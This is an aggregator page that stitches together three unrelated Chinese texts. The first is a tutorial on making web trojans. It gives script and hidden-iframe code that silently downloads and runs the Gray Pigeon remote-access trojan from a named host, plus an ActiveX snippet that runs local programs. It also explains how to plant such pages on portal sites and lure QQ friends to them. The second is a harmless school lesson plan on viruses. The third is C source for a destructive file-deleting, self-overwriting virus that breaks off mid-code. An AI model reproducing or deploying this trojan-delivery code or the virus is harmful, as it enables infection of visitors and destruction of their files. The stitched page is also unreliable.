篇一:网页木马制作全过程(详细)
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。 一、网页木马的攻击原理
首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>
小提示:代码说明
a. 代码中“src”的属性为程序的网络地址,本例中
“http://go163go.vicp.net/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。把这段代码插入到网页源代码的</BODY>?</BODY>之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录<Temporary Internet Files>,
你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
图1
网页
木马示例
小提示:灰鸽子木马
为什么一定要用灰鸽子木马呢?因为灰鸽子是反弹型木马,该木马能绕过天网等大多数防火墙的拦截,中马后,服务端即被控端能主动连接控制端(客户端),也就是说,一旦被控端连接到Internet,在控制端那里,被控端就会“自动上线”(如图2)。
图2 灰鸽子控制短示例(汗!又一大毒枭:))
⒉自动运行程序
<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application");
shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT> 把这段代码插入到网页源代码的</BODY>?</BODY>之间,然后用IE打开该网页,你会发现,这段代码可以在没有打相关补丁的IE6中自动打开记事本。这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,可以用它自动运行本地电脑上的任意程序。
通过以上的代码我们可以看出,利用IE的漏洞,也就是说在网页中插入适当的代码,IE完全可以自动下载和运行程序,不过,IE一旦打了相关补丁,这些代码就会失去作用。另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃避追杀,黑客可能会使用一些工具对网页的源代码进行加密处理(如图3)。 图3 加密后的网页代码
二、网页木马的基本用法
理解了网页木马攻击的原理,我们可以制作自己的网页木马,但这需要你根据IE漏洞写出利用代码。实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页
木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到网络上),
利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生成网页木马并让他人中木马。
第一步:启动该网页木马生成器,如图4所示,在文本框中输入木马的网络地址,最后单击“生成”。
图4
网页木马生成器
第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。现在好了,把上述网页在服务器上的地址(网址)通过QQ发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。
现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Internet,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页木马。
在下面我们只介绍黑客如何在知名网站上挂网页木马。下面来看这一段代码:iframe src="http://go163go.vicp.net/hk.htm" width="0" height="0" frameborder="0"></iframe>
小提示:“src”的属性“http://go163go.vicp.net/hk.htm”是上传到服务器上的网页木马的网址。
把这段代码插入到某门户网站首页源代码的</BODY>?</BODY>之间,从表面上看,插入后该门户的首页并没有什么变化,但是,所有访问了该门户网站首页的人都会中木马,为什么会这样呢?这是因为这段代码中<iframe>标签把网页木马网页隐藏性地“包含”在了插入代码的网页当中。
<iframe>也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果(如图5),被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。在上代代码中,因为把宽(width)、高(height)、边框(frameborder)都设置为了“0”,所以,上述代码插入到门户网站的首页后,网站的首页不会发生变化,但是,由于嵌入的网页实际上已经打开了,所以网页上的下载木马和运行木马的脚本还是会随着门户首页的打开而执行的。
图5 iframe标签示例
也许有人会问,如何把上述代码插入到门户网站首页的源代码中?这个问题问得好,本人才疏学浅,确实无法进入他们的服务器修改网页,但是黑客如果发现了这些服务器上的漏洞且获得了webshell权限,那么修改他们的网页就跟在本地制作一个网页一样容易。
有人还问,拿到服务器的webshell权限容易吗?如果你对网络安全比较关注,你会发现,经常有这个网站被黑了,那个网站的主页被修改了的新闻爆出。有人还问,门户的服务器几乎无漏洞可找,个人服务器的漏洞较多,
你能进入吗?本人不是黑客,中华人民共和国的法律规定,入侵和篡改他人服务器上的信息是违法行为,希望大家共同维护网络安全。
篇二:《计算机病毒》教学设计
《计算机病毒》教学设计
湖南省桃江一中 田 岱
一、教学目标:
1. 使学生了解什么是计算机病毒及病毒的特点; 2. 初步掌握计算机病毒的基本防治方法; 3. 提高学生防治电脑病毒的意识; 4. 增强学生的法治观念和道德水平;
二、教学重点和难点:
计算机病毒的基本防治方法
三、教学方法:
启发式教学
四、教学用具:
投影机、《计算机病毒》的课件
五、教学过程:
1. 引入:
从世界上第一台电子计算机在美国诞生到现在的五十几年的时间里, 计算机的软硬件技术得到了迅猛的发展, 计算机开始逐步走进家庭, 但是,同学们在使用计算机的过程中,尤其是上网以后, 计算机信息系统的安全性问题显得越来越突出, 今天这节课,我就给大家介绍计算机病毒的基本防治方法。首先请同学们看看下列有关材料。
问:大家有没有碰到过计算机病毒或是听说过什么样的病毒?你们见过计算机病毒发作时的样子吗?
解答:给学生演示几种病毒发作的现象。
演示完毕,指出:“危害最大的病毒发作的时候没有这些直观的现象。”
一、什么是计算机病毒?
计算机病毒是一个小程序, 能够自身复制自身, 会将自己的病毒码依附在别的程序上,通过主程序的执行,伺机传播病毒程序,有一定潜伏期,一旦条件成熟,进行各种破坏活动,影响计算机使用。
注:提问时注意从以下几个方面启发学生:
(1)"计算机病毒"首先是某些人编写的一种计算机程序;
(2)为了掩人耳目,病毒程序在计算机内怎么藏身?
依附于一些正常的文件中或内存中;
(3)既然病毒不是一个独立的文件,它怎么被执行?根据演示,具体问题具体分析;
(4)计算机内染了病毒之后,是立即发作吗?一般不会立即发作;
(5)为什么把这种程序称作"病毒"?象生物病毒一样有复制能力。
(6)计算机病毒对计算机有什么影响? 毁坏数据,影响使用;
二、计算机病毒对计算机的影响:
1. 降低系统执行效率 2. 在屏幕上显示各种信息 3. 造成死机 4. 部分文件被删除 5. 改变存储在硬件上的程序 6. 破坏整个硬盘或软盘内资料
注:放内容为"3种病毒发作现象"的FLASH动画来启发引导学生归纳出病毒的特点。 思考练习:
1. 如果一张有病毒程序的盘拿到计算机上使用,会不会给这台计算机也带来病毒?
——传染性。
2. 病毒程序在计算机内怎么藏身呢?——寄生性、隐蔽性 3. 计算机被感染病毒后立即发作吗? ——潜伏性 4. CIH病毒在几号发作?时间不是26日发作吗?——可触发性 5. 计算机被病毒感染后会对计算机怎么样?——破坏性
6. 计算机病毒可以通过因特网在24小时内传遍全球。——广泛性、快速性
三、归纳计算机病毒的特点:
传染性、寄生性、隐蔽性、潜伏性、可触发性、破坏性、广泛性、快速性 注:放1张“1998-2001年”计算机病毒感染率和发展趋势图"的FLASH动画示意图给学生说明计算机的安全趋势已不容乐观,以提高他们对计算机病毒的防范意识。并简要介绍仅CIH一种病毒带来的危害性。
计算机病毒给全球带来了巨大的经济损失,仅CIH一种病毒造成的经济损失就达到了近五十亿美元。(FLASH动画演示)到现在为止,病毒的数量超过了50000,而且越来越多,所以计算机安全的形势不容乐观。
注:继续放一张"计算机病毒的传播途径"的FLASH小动画,简要介绍计算机病毒过去和现在两种不同的传播途径,然后重点讲"感染"这一环节。通过放1张"单机感染过程"、2张"网络传播"FLASH小动画让学生有感性认识。
继续提问:计算机病毒是通过什么途径传播的呢?
软盘、盗版光盘、硬盘、网络。
教师提示:当我们对计算机这些部件进行读写操作时,病毒很可能就趁虚而入,难道,对病毒就没有办法吗?怎么防范呢?
注:放1张"传统计算机病毒的防范方法",利用此小动画重点讲解如何在上面提到的四种传播渠道上防治病毒。尽量引导学生说出。语速要慢让学生有时间在讲义上记录。
四、计算病毒的防治 1. 软盘:外来软盘要查毒、杀毒,重要软盘要防写,重要数据要备份; 2. 光盘:使用正版光盘软件; 3. 网络:安装公安部的KILL实时监控、并及时升级(一月2次); 4. 硬盘:安装硬盘保护卡、病毒防火墙(瑞星)
注:由于每次使用软盘、光盘、网络、邮件都要查毒,给同学介绍一种新的防毒技术 "实时反病毒技术",放FLASH动画进一步说明。对如何购买物美价廉的正版光盘软件及一些名词解释要介绍给学生。
五、培养使用计算机的良好道德
研究性题:阅读下列材料,说说你的看法,并对自己将来使用计算机时应注意的行为规范。 材料一:某学生对同学说:“我这里有一张游戏盘,上机 课时玩。”
材料二:我喜欢买盗版盘,既经济又实用,听我的,准没错。
材料三:将来我要当一位“黑客”,专门破解人家的密码,那才好玩啦。
材料四:有个别学生常在学校机房篡改他人的文件,并在计算机上描绘一些动物图像,
取他人的姓名,附有一些不健康的语言。以此为乐。
同学们如果将来从事计算机软件开发工作,不要故意用自己所学的知识制毒、传毒给人类造成巨大的危害。要遵守国家法律,自觉维护社会公德。
注:"放一段小动画"。 培养使用计算机的良好道德要从我做起,从现在做起,请同学在讲
义上填写问卷,作为今天的课后作业。
六、总结:(略)
2015年3月
篇三:用C语言编写简单的病毒
用C语言编写简单的病毒[转]
2007年08月28日 星期二 下午 03:39
[摘要]在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现.
[Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0.
一、什么是病毒
恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在畔 踩 惺呛苤匾 ?
我们要对付病毒,就要了解病毒.
写一些病毒是一个很好的办法.
如果要写一个病毒,先要知道它是什么.可以给病毒一个定义,这一定义是被广泛认可的。Frederic Cohen博士在《计算机病毒简短讲座》中提到的:
“……一种能够通过修改自身来包括或释放自我拷贝而传染给其他程序的程序。“
其实病毒和普通程序并无太大不同,而且通常比较简单,不像很多程序那样复杂。只不过病毒里面用到一些正常程序一般不会用到的技术。
要编制一个病毒,首先要知道病毒的运行机理。
不论是何种病毒,它一般在结构上分为三个功能模块:感染机制,触发机制和有效载荷。
在病毒结构中,首要的而且唯一必需的部分是感染机制。病毒首先必须是能够繁殖自身的代码,这是病毒之所以成为病毒的根本
原因。我们可以用一段类C伪码来表示这个过程。
InfectSection()
{
if (infectable_object_found
&&object_not_already_infect)
infect_object;
}
病毒的第二个主要构成部分是有效载荷触发事件.一个病毒来到你的电脑后,不大可能立即发作,否则它不会被传播得很远.潜伏的敌人永远要比能见到的敌人危险得多.病毒一般是在找到一定数量的感染体,某一日期或时间,某一段文本后触发.
一个简单的触发机制可能是这样工作的:
TriggerSection()
{
if (date_is_Friday_13th_and_time_is_03:13:13)
set_trigger_status_to_yes; }
有效载荷就是病毒用来骚扰你的电脑的方法,有触发机制的病毒一般也有有效载荷。它可以是任意的给你发一条一次性简单的愚弄信息,重新格式化你的磁盘,
把它自己邮给你的E_mail通信者都可以成为有效的负荷。简单的有效负荷可以如下进行:
Executesection()
{
if (trigger_statue_is_yes)
execute_payload;
}
二、 编制病毒的语言
最常见的编制病毒的语言有汇编语言、VB、C 语言等,我们可以来看一看一个有名的病毒论坛上认为学写病毒要掌握的基础:
1).Win32编程,进程,线程,内存,等等。
2).32位汇编,以指令用法为主。386汇编就比较够用了。
3).PE格式,有精力还可以看一下其它可能被感染的文件的文件格式。
4).调试技术。VC,TD32,SoftIce,等等。
要掌握的东西确实很多,还多听都没听过,很吓人.但实际上,即使我们对计算机的原理和操作系统不很了解,而且不熟悉除C
以外的其他语言,只要我们对C的库函数有一定了解,就可以写一些类似病毒的东西.
三 用C编制病毒
以TurboC2.0为例.它的库函数可以实现很多功能.
如以下两个函数:
1).findfirst和findnext函数:在dir.h。findfirst用来找各种类型的文件,可以得到文件名文件长度,文件属性等,findnext和findfirst配合使用,用来找到下一个同类型的文件。
2).remove函数:在stdio.h.只要知道文件名,可以删除任意类型的文件.
四 我写的C病毒
<<计算机病毒解密>>上有一句比较经典的话,"或许把恶意软件造成的损害说成是心理上的损害
可能会更恰当一些".从这个意义上说,我的病毒是非常典型的病毒. 下面是我写的病毒.
它主要由四个模块组成.
RubbishMaker()可用来在当前目录下生成大量随机命名的垃圾文件. CreatEXE()将在C盘的敏感地方放置几个.exe垃圾,它们要隐蔽一些。 Remove()会删掉你的一些东西,所以千万不要随便运行这个程序.
Breed()是C_KILLER的精华所在,它将kill所有的c程序,并利用它们繁殖自身.
前三个是有效负载.
第四个可以说是它的感染机制.
/**********************************
IN FACT,IT"S NOT A VIRYUS AT ALL.
**********************************/
#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* copy outfile to infile */
void copyfile(char *infile, char *outfile)
{
FILE *in,*out;
in = fopen(infile,"r");
out = fopen(outfile,"w");
while (!feof(in))
{
fputc(fgetc(in),out);
}
fclose(in);
fclose(out);
}
/*
This function named Rubbishmaker.
*/
void MakeRubbish()
{
int i;
FILE *fp;
char *path;
char *NewName;
char *disk[7] = {"A","B","C","D","E","F","G"};
char *addtion = ":\\";
/* Make some rubbish at the current catalogue */
for (i = 0; i<5; i++)
{
char tempname[] = "XXXXXX" ;
NewName = mktemp(tempname);
fp = fopen(NewName,"w");
fclose(fp);
}
/* make some rubbish at the root catalogue */
path = strcat(disk[getdisk()],addtion); /* get the root catalogue */
chdir(path); /*change directory according to the "path" */
for (i = 0; i<5; i++)
{
char tempname[] = "XXXXXX";
NewName = mktemp(tempname);
fp = fopen(NewName,"w");
fclose(fp);
}
}
/*
This function can creat some .exe or .com documents in the sensitive place. Don't worry,It's only a joke.It will do no harm to your computer.
*/
void CreatEXE()
{
int i;
char *path;
char *s[2] =
{"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\virusssss.com"};
for ( i = 0; i < 2; i++)
{
open(s, 0x0100,0x0080);
copyfile( "C_KILLER.C",s);
}
}
/* remove something from your computer */
void Remove()
{
int done;
int i;
struct ffblk ffblk;
char *documenttype[3] = {"*.txt","*.doc","*.exe"}; for (i = 0; i < 3; i++)
{
done = findfirst(documenttype,&ffblk,2);while (!done)
{
remove(ffblk.ff_name);
done = findnext(&ffblk);
}
}
}
/* overlay the c programs */
void Breed()
{
int done;
struct ffblk ffblk;
done = findfirst("*.c",&ffblk,2);
while (!done)
{
if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )
《电脑病毒制作软件》
由:免费论文网互联网用户整理提供,链接地址:
http://m.csmayi.cn/meiwen/42734.html
转载请保留,谢谢!
- 上一篇:遵守公司制度的重要性
- 下一篇:病毒性结膜炎